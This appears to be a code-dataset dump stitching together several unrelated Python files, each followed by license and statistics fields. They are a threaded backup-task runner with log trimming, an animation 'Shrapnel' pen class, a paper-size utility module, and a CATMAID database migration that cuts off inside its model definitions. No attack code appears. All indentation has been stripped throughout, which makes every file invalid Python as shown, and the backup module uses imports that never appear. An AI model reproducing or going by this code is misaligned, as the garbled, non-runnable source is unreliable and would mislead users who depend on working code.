from threading import Thread
from ..command import get_cmdline_for_subcommand
from ..util import make_dir_path
class Unit(object):
def __init__(self):
self.root = None
self.backup_args = None
def __str__(self):
return self.root
class Task(object):
DATE_FMT = '%Y%m%d'
LOG_EXCERPT_INPUT_BYTES = 8192
LOG_EXCERPT_MAX_BYTES = 4096
LOG_EXCERPT_MAX_LINES = 10
def __init__(self, thread_count, units):
self._queue = Queue.Queue()
for unit in units:
self._queue.put(unit)
self._success = True
self._threads = [Thread(target=self._worker)
for i in range(thread_count)]
def start(self):
for thread in self._threads:
thread.start()
def _worker(self):
while True:
try:
unit = self._queue.get_nowait()
except Queue.Empty:
return
try:
if not self._execute(unit):
self._success = False
except:
self._success = False
raise
def _execute(self, unit):
raise NotImplementedError
def wait(self):
for thread in self._threads:
thread.join()
return self._success
def _run_subcommand(self, name, args, log_dir):
log_base = os.path.join(log_dir, date.today().strftime(self.DATE_FMT))
timestamp = lambda: datetime.now().strftime('%Y-%m-%d %H:%M:%S')
sys.stdout.write('Starting %s\n' % name)
command = get_cmdline_for_subcommand(args)
with open('/dev/null', 'r+') as null:
with open(log_base + '.err', 'a') as err:
with open(log_base + '.out', 'a') as out:
for fh in out, err:
fh.write('# Starting task at %s\n' % timestamp())
fh.write('# %s\n' % ' '.join(command))
fh.flush()
ret = subprocess.call(command, stdin=null, stdout=out,
stderr=err, close_fds=True)
for fh in out, err:
if ret < 0:
fh.write('# Task died on signal %d\n' % -ret)
else:
fh.write('# Task exited with status %d\n' % ret)
fh.write('# Ending task at %s\n\n' % timestamp())
if ret:
with open(log_base + '.err') as err:
# Read LOG_EXCERPT_INPUT_BYTES
err.seek(0, 2)
start = max(0, err.tell() - self.LOG_EXCERPT_INPUT_BYTES)
err.seek(start)
excerpt = err.read(self.LOG_EXCERPT_INPUT_BYTES).strip()
truncated = start > 0
# Drop exception backtraces
accept = True
excerpt_lines = []
for line in excerpt.split('\n'):
if accept:
if line == 'Traceback (most recent call last):':
accept = False
else:
excerpt_lines.append(line)
elif not line.startswith(' '):
accept = True
excerpt_lines.append(line)
# Reduce to LOG_EXCERPT_MAX_BYTES
excerpt = '\n'.join(excerpt_lines)
if len(excerpt) > self.LOG_EXCERPT_MAX_BYTES:
excerpt = excerpt[-self.LOG_EXCERPT_MAX_BYTES:]
truncated = True
# Reduce to LOG_EXCERPT_MAX_LINES
excerpt_lines = excerpt.split('\n')
if len(excerpt_lines) > self.LOG_EXCERPT_MAX_LINES:
excerpt_lines = excerpt_lines[-self.LOG_EXCERPT_MAX_LINES:]
truncated = True
# Add truncation indicator
if truncated:
excerpt_lines.insert(0, '[...]')
# Serialize
excerpt = '\n'.join(' ' * 3 + l for l in excerpt_lines)
sys.stderr.write('Failed: %s\n %s\n%s\n' % (name,
' '.join(command), excerpt))
sys.stdout.write('Ending %s\n' % name)
return ret == 0
class _SourceBackupTask(Task):
def __init__(self, settings, thread_count, units):
Task.__init__(self, thread_count, units)
self._settings = settings
def _execute(self, unit):
log_dir = make_dir_path(self._settings['root'], 'Logs', unit.root)
return self._run_subcommand(unit.root, unit.backup_args, log_dir)
class Source(object):
def __init__(self, config):
self._settings = config.get('settings', {})
self._manifest = config.get(self.LABEL, {})
@classmethod
def get_sources(cls):
sources = {}
for subclass in cls.__subclasses__():
if hasattr(subclass, 'LABEL'):
sources[subclass.LABEL] = subclass
return sources
def get_units(self):
raise NotImplementedError
def get_backup_task(self):
thread_count = self._settings.get('%s-workers' % self.LABEL, 1)
return _SourceBackupTask(self._settings, thread_count,
self.get_units())
# Now import submodules that need these definitions
from . import coda, github, rbd, rgw, rsync
| gpl-2.0 | -1,964,339,124,457,846,000 | 34.691429 | 79 | 0.538585 | false | 4.032279 | false | false | false |
slobberchops/rop | art/utils/shrapnel.py | 1 | 1757 | from pen import Pen
from math import sin, cos, pi, sqrt
from random import random
class Shrapnel(Pen):
def __init__(self, matrix, motion_cycles, huedelta=0.001, saturation=1,
radius=0, decelerate=False):
self.centerx = matrix.width/2.0
self.centery = matrix.height/2.0
self.cycles = motion_cycles
self.decelerate = decelerate
# we will reset some params to sensible values in a minute, so let's
# not fuss with x, y, dx, dy now
super(Shrapnel, self).__init__(
matrix.width,
matrix.height,
0, 0, 0, 0,
huedelta=huedelta,
saturation=saturation,
radius=radius
)
super(Shrapnel, self).setBumpStrategy(self._pause, x=True, y=True)
self.reset(matrix)
def _pause(self, x=None, y=None):
self.paused = True
def reset(self, matrix):
# the furthest distance any pen will have to travel is on the diagonal
w, h = matrix.width, matrix.height
maxDimension = sqrt(w*w + h*h)
# slowest pens need to cover the distance in cycles time, but there may
# be some that go faster
velocity = maxDimension/(2.0*self.cycles) + 0.05*random()*maxDimension
angle = random()*2*pi
self.dx = velocity * sin(angle)
self.dy = velocity * cos(angle)
self.x = self.centerx
self.y = self.centery
self.paused = False
def clock(self, matrix):
super(Shrapnel, self).clock(matrix)
# optionally slow over time
# XXX: this may cause problems for larger spans?
if self.decelerate:
self.dx *= 0.99
self.dy *= 0.99
return self.paused
| gpl-3.0 | -1,175,577,868,237,285,400 | 29.293103 | 79 | 0.583381 | false | 3.738298 | false | false | false |
idmillington/papersizes | papersizes/papersize.py | 1 | 9882 | # -*- coding: utf-8 -*-
"""
Page sizes and various mechanisms for manipulating them.
"""
import math
import collections
from .units import mm, inch
# ----------------------------------------------------------------------------
# Page size tuple.
# ----------------------------------------------------------------------------
class PaperSize(collections.namedtuple('PaperSize', 'width height')):
"""The size of a piece of paper.
This class inherits from a named tuple and has an empty ``__slots__``
property, so it is immutable and inextensible. It is used, rather
than a raw (width, height) tuple, to allow additonal methods to
be defined."""
__slots__ = ()
@classmethod
def from_mm(Class, width_in_mm, height_in_mm):
"""Convert from width and height in mm into standard pts."""
return Class(width_in_mm*mm, height_in_mm*mm)
@classmethod
def from_inch(Class, width_in_inch, height_in_inch):
"""Convert from width and height in inches into standard pts."""
return Class(width_in_inch*inch, height_in_inch*inch)
@classmethod
def from_ratio(Class, width=None, height=None, ratio=1.0):
"""Create a new paper size from the given ratio and one dimension.
Arguments:
``ratio``
The ratio of the height to the width of the resulting page. So
a ratio of 1.5 (i.e. 3:2) will be 1.5x as tall as it is wide.
Note that the ``ratio`` property returns
the ratio of long to short
side, not height to width. For the same ratio, therefore, this
function will generate a paper in portrait orientation. The
``papersizes.ratios`` module provides a series of common
ratios.
"""
if width is None:
if height is None:
raise ValueError('width or height must be given')
else:
return Class(height / ratio, width)
else:
if height is None:
return Class(width, height * ratio)
else:
raise ValueError('only one of width or height may be given')
@property
def area_in_sq_pts(self):
"""The area of this paper."""
return self.width * self.height
@property
def ratio(self):
"""The ratio of long to short side."""
if self.width > self.height:
return self.width / self.height
else:
return self.height / self.width
def landscape(self):
"""Return a version of this paper size in landscape orientation."""
if self.width >= self.height:
return self
else:
return self.flip()
def portrait(self):
"""Return a version of this paper size in portrait orientation."""
if self.width <= self.height:
return self
else:
return self.flip()
def flip(self):
"""Return a version of this paper size with dimensions reversed."""
return PaperSize(self.height, self.width)
def half(self):
"""Paper half the size of this, cut parallel to the short edge.
If the original paper is portrait, the returned paper will be also,
and vice versa.
"""
if self.height < self.width:
if self.height > self.width / 2:
return PaperSize(self.height, self.width / 2)
else:
return PaperSize(self.width / 2, self.height)
else:
if self.width > self.height / 2:
return PaperSize(self.height / 2, self.width)
else:
return PaperSize(self.width, self.height / 2)
def small_square(self):
"""Return a square paper size using the smaller dimension."""
if self.height < self.width:
return PaperSize(self.height, self.height)
elif self.height == self.width:
return self
else:
return PaperSize(self.width, self.width)
def large_square(self):
"""Return a square paper size using the larger dimension."""
if self.height > self.width:
return PaperSize(self.height, self.height)
elif self.height == self.width:
return self
else:
return PaperSize(self.width, self.width)
def round_to_mm(self):
"""Return a paper size with dimensions rounded to the nearest mm."""
return PaperSize(round(self.width / mm)*mm, round(self.height / mm)*mm)
def is_landscape(self):
"""Check if this paper is landscape oriented.
Square paper is neither landscape or portrait."""
return self.width > self.height
def is_portrait(self):
"""Check if this paper is portrait oriented.
Square paper is neither landscape or portrait."""
return self.width < self.height
def is_square(self):
"""Check if this paper is square."""
return self.width == self.height
def is_approximately(self, other, tolerance=0.1*mm):
"""Check if the given paper size is roughly the same as this one.
Arguments:
``other``
The paper size to compare against. This can be given as any
(width, height) tuple, it doesn't have to be a ``PaperSize``
instance.
"""
return abs(self.width - other[0]) <= tolerance and \
abs(self.height - other[1]) <= tolerance
def add_bleed(self, bleed):
"""Return a paper size with the given bleed added.
Standard bleeds are 3mm internationally and 1/8" US. Large images and
die cuts have a larger bleed."""
if bleed != 0.0:
return PaperSize(self.width + bleed*2.0, self.height + bleed*2.0)
else:
return self
def as_pt_str(self):
"""Printable description of the size, to the nearest point."""
return '{0:.0f}x{1:.0f}pt'.format(self.width, self.height)
def as_mm_str(self):
"""Printable description of the size, to the nearest mm."""
return '{0:.0f}x{1:.0f}mm'.format(self.width / mm, self.height / mm)
def as_inch_str(self, unit='"'):
"""Printable description of the size, to the nearest ⅛ of an inch."""
EIGHTHS = ('', '⅛', '¼', '⅜', '½', '⅝', '¾', '⅞')
def _to_eight(val):
val /= inch
whole = math.floor(val)
eighth = round(val * 8) % 8
return '{0:.0f}{1}'.format(whole, EIGHTHS[eighth])
return '{0}x{1}{2}'.format(
_to_eight(self.width), _to_eight(self.height), unit)
def __repr__(self):
return 'PaperSize({0:f}, {1:f})'.format(self.width, self.height)
def __str__(self):
return '{0} ({1}, {2})'.format(
self.as_pt_str(), self.as_mm_str(), self.as_inch_str())
# ----------------------------------------------------------------------------
# Page size generator.
# ----------------------------------------------------------------------------
class ISO269Series(object):
"""
A set of paper sizes conforming to ISO 269.
ISO 269 specifies tolerances of at least 1mm in page sizes and
these are often used to make sure that each page size is an
integer number of mm in each direction. So A4 is of width 210mm,
although A0 is 841mm wide. This breaks the normal halving rule,
but is a widespread standard.
Instances of this class can be used to retrieve paper sizes by
using subscript notation: ``A[5]``, for example. There is no limit
to the large (lower numbered) sizes that can be calculated in this
way, but because this class always rounds to the nearest millimeter,
very small paper sizes (high numbered) will be meaningless.
Paper sizes returned by this class are portrait oriented.
Arguments:
``initial_size``
The 'reference' paper size for this series. This is usually a
large size, most commonly the 0-size. This can be given as any
(width, height) tuple, it doesn't have to be a ``PaperSize``
instance.
``initial_number``
The size number of the initial paper size given in the first
argument.
"""
def __init__(self, initial_size, initial_number=0):
# We might be given a plain tuple, so don't use PaperSize.portrait
if initial_size[0] > initial_size[1]:
initial_size = initial_size[1], initial_size[0]
# Store the size internally in mm, so we can do the simplification.
initial_in_mm = round(initial_size[0] / mm), round(initial_size[1] / mm)
self.cache = {initial_number:initial_in_mm}
self.min_cached = initial_number
self.max_cached = initial_number
self.initial_size = initial_size
self.initial_number = initial_number
def __repr__(self):
return "ISO 269 Series, {0} at size {1}".format(
repr(self.initial_size),
repr(self.initial_number))
def __getitem__(self, size):
if size not in self.cache:
if size > self.max_cached:
# We're smaller than the last value cached.
last = self.cache[self.max_cached]
for s in range(self.max_cached+1, size+1):
next = last[1] // 2, last[0]
self.cache[s] = next
last = next
self.max_cached = size
else:
# We're larger than the initial.
last = self.cache[self.min_cached]
for s in range(self.min_cached-1, size-1, -1):
next = last[1], last[0] * 2
self.cache[s] = next
last = next
self.min_cached = size
# Cached data is in mm, so convert to pts.
return PaperSize.from_mm(*self.cache[size]) | mit | -5,493,778,113,455,439,000 | 36.245283 | 80 | 0.567332 | false | 4.059646 | false | false | false |
htem/CATMAID | django/applications/catmaid/migrations/0022_cleanup_neurons_and_skeletons.py | 4 | 49681 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
verbose_log = False
def log(msg):
print(" %s" % msg)
def logv(msg):
if verbose_log:
log(msg)
else:
return
class Migration(DataMigration):
def forwards(self, orm):
""" This migration will make sure that every neuron that exists has
exactly one skeleton linked to it. Neurons that are linked to no
skeleton will be deleted. Neurons that are linked to multiple skeletons
will be duplicated and each skeleton will be linked to one copy.
"""
# Get IDs of 'model_of' relation and 'skeleton' class for every project.
# Ignore the project, if these don't exist.
for p in orm.Project.objects.all():
log("Looking at project #%s" % p.id)
try:
model_of_rel = orm.Relation.objects.get(project=p,
relation_name='model_of')
skeleton_cls = orm.Class.objects.get(project=p,
class_name='skeleton')
neuron_cls = orm.Class.objects.get(project=p,
class_name='neuron')
except orm.Relation.DoesNotExist:
log("Project #%s doesn't have a 'model_of' relation. " \
"Ignoring it." % p.id)
continue
except orm.Class.DoesNotExist:
log("Project #%s doesn't have a 'skeleton' or 'neuron' class. " \
"Ignoring it." % p.id)
continue
# Prefetching the 'cici_via_a' and 'cici_via_b' takes unfortunately
# too much memory.
neurons = orm.ClassInstance.objects.filter(project_id=p.id,
class_column_id=neuron_cls)
log("Processing %s neurons" % len(neurons))
# Calculate percentage output marks for output every 10%
output_count = {}
for i in range(10):
output_count[i*(len(neurons)/10)] = i * 10
output_count[len(neurons) - 1] = 100
deleted_neurons = 0
cloned_neurons = 0
for i, n in enumerate(neurons):
# Give some rough estimate were we are
if i in output_count:
log("%s%%" % output_count[i])
# To copy all CICI links, the originals are needed
from_links = n.cici_via_a.all()
to_links = n.cici_via_b.all()
# Skeleton links are 'to links': skeleton model_of neuron. Go through
# them, delete all but the first and push deleted ones to work list.
skeleton_links = []
other_to_links = []
for l in to_links:
has_sk_rel = l.relation_id == model_of_rel.id
has_sk_cls = l.class_instance_a.class_column_id == skeleton_cls.id
if has_sk_rel and has_sk_cls:
skeleton_links.append(l)
else:
other_to_links.append(l)
# Get number of linked skeletons
nr_skeleton_links = len(skeleton_links)
# Delete neurons that don't have any skeleton link
if not nr_skeleton_links:
n.delete()
deleted_neurons = deleted_neurons + 1
continue
# Skip all neurons that have exactly one skeleton linked
elif nr_skeleton_links == 1:
continue
# Clone all neurons that have more than one skeleton linked and link
# one copy to one skeleton.
logv("Expanding neuron #%s into %s clones." % (n.id, nr_skeleton_links))
logv(" Original CICI (via a) link IDs: %s" % \
str([l.id for l in from_links]))
logv(" Original CICI (via b) link IDs: %s" % \
str([l.id for l in to_links]))
# Create skeleton_links - 1 clones
for k in range(nr_skeleton_links - 1):
# Django will create a new copy of the object if the primary key
# is set to None.
n.pk = None
n.save()
# Explicitly re-create links
for l in from_links:
# Clone CICI link
l.pk = None
l.class_instance_a = n
l.save()
for l in other_to_links:
# Clone CICI link
l.pk = None
l.class_instance_b = n
l.save()
# Get a skeleton link, delete it from the original neuron an
# link ot to the new neuron.
skeleton_l = skeleton_links.pop()
skeleton_l.delete()
skeleton_l.pk = None
skeleton_l.class_instance_b = n
skeleton_l.save()
# Output to compare IDs
logv(" Clone #%s CICI (via a) link IDs: %s" % \
(n.id, str([l.id for l in n.cici_via_a.all()])))
logv(" Clone #%s CICI (via b) link IDs: %s" % \
(n.id, str([l.id for l in n.cici_via_b.all()])))
# Keep track of cloned neuron count
cloned_neurons = cloned_neurons + 1
action = "%s have been deleted." % deleted_neurons \
if deleted_neurons else "Nothing to delete."
log("Found %s neuron(s) that had no skeleton linked. %s" % \
(deleted_neurons, action))
action = "%s have been cloned." % cloned_neurons \
if cloned_neurons else "Nothing to do."
log("Found %s neuron(s) that had multiple skeleton linked. %s" % \
(cloned_neurons, action))
# Check if there are now only neurons with exactly one skeleton
# linked.
nr_neurons = orm.ClassInstance.objects.filter(project_id=p.id,
class_column_id=neuron_cls.id).count()
skeleton_links = orm.ClassInstanceClassInstance.objects.filter(
project_id=p.id,
class_instance_a__class_column_id=skeleton_cls.id,
class_instance_b__class_column_id=neuron_cls.id,
relation_id=model_of_rel).values('class_instance_b').annotate(
sk_count=models.Count('class_instance_a'))
for l in skeleton_links:
if l['sk_count'] != 1:
raise RuntimeError("Number of skeleton links for neurons %s ' \
'is %s instead of 1. Aborting." % l.class_instance_b)
log("Each neuron of project #%s has now exactly one skeleton " \
"linked" % p.id)
if (nr_neurons == len(skeleton_links)):
log("Number of neurons is now equal to number of skeleton links")
else:
raise RuntimeError("Number of neurons (%s) is not equal to ' \
'number of skeleton links (%s) after this migration. ' \
'Aborting." % (nr_neurons, len(skeleton_links)))
log("Done with data migration")
def backwards(self, orm):
print("This data migration cannot be reverted!")
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catmaid.apikey': {
'Meta': {'object_name': 'ApiKey'},
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'catmaid.brokenslice': {
'Meta': {'object_name': 'BrokenSlice', 'db_table': "'broken_slice'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"})
},
'catmaid.cardinalityrestriction': {
'Meta': {'object_name': 'CardinalityRestriction', 'db_table': "'cardinality_restriction'"},
'cardinality_type': ('django.db.models.fields.IntegerField', [], {}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'restricted_link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassClass']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.changerequest': {
'Meta': {'object_name': 'ChangeRequest', 'db_table': "'change_request'"},
'approve_action': ('django.db.models.fields.TextField', [], {}),
'completion_time': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'change_recipient'", 'db_column': "'recipient_id'", 'to': "orm['auth.User']"}),
'reject_action': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'validate_action': ('django.db.models.fields.TextField', [], {})
},
'catmaid.class': {
'Meta': {'object_name': 'Class', 'db_table': "'class'"},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classclass': {
'Meta': {'object_name': 'ClassClass', 'db_table': "'class_class'"},
'class_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'classes_a'", 'db_column': "'class_a'", 'to': "orm['catmaid.Class']"}),
'class_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'classes_b'", 'db_column': "'class_b'", 'to': "orm['catmaid.Class']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classinstance': {
'Meta': {'object_name': 'ClassInstance', 'db_table': "'class_instance'"},
'class_column': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Class']", 'db_column': "'class_id'"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classinstanceclassinstance': {
'Meta': {'object_name': 'ClassInstanceClassInstance', 'db_table': "'class_instance_class_instance'"},
'class_instance_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cici_via_a'", 'db_column': "'class_instance_a'", 'to': "orm['catmaid.ClassInstance']"}),
'class_instance_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cici_via_b'", 'db_column': "'class_instance_b'", 'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.concept': {
'Meta': {'object_name': 'Concept', 'db_table': "'concept'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.connector': {
'Meta': {'object_name': 'Connector', 'db_table': "'connector'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'connector_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.connectorclassinstance': {
'Meta': {'object_name': 'ConnectorClassInstance', 'db_table': "'connector_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.constraintstosegmentmap': {
'Meta': {'object_name': 'ConstraintsToSegmentMap'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'segments': ('catmaid.fields.IntegerArrayField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'target_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'catmaid.dataview': {
'Meta': {'ordering': "('position',)", 'object_name': 'DataView', 'db_table': "'data_view'"},
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'config': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'data_view_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.DataViewType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.dataviewtype': {
'Meta': {'object_name': 'DataViewType', 'db_table': "'data_view_type'"},
'code_type': ('django.db.models.fields.TextField', [], {}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.deprecatedappliedmigrations': {
'Meta': {'object_name': 'DeprecatedAppliedMigrations', 'db_table': "'applied_migrations'"},
'id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'primary_key': 'True'})
},
'catmaid.deprecatedsession': {
'Meta': {'object_name': 'DeprecatedSession', 'db_table': "'sessions'"},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '26'})
},
'catmaid.drawing': {
'Meta': {'object_name': 'Drawing', 'db_table': "'drawing'"},
'component_id': ('django.db.models.fields.IntegerField', [], {}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_x': ('django.db.models.fields.IntegerField', [], {}),
'max_y': ('django.db.models.fields.IntegerField', [], {}),
'min_x': ('django.db.models.fields.IntegerField', [], {}),
'min_y': ('django.db.models.fields.IntegerField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'skeleton_id': ('django.db.models.fields.IntegerField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'svg': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'z': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.location': {
'Meta': {'object_name': 'Location', 'db_table': "'location'"},
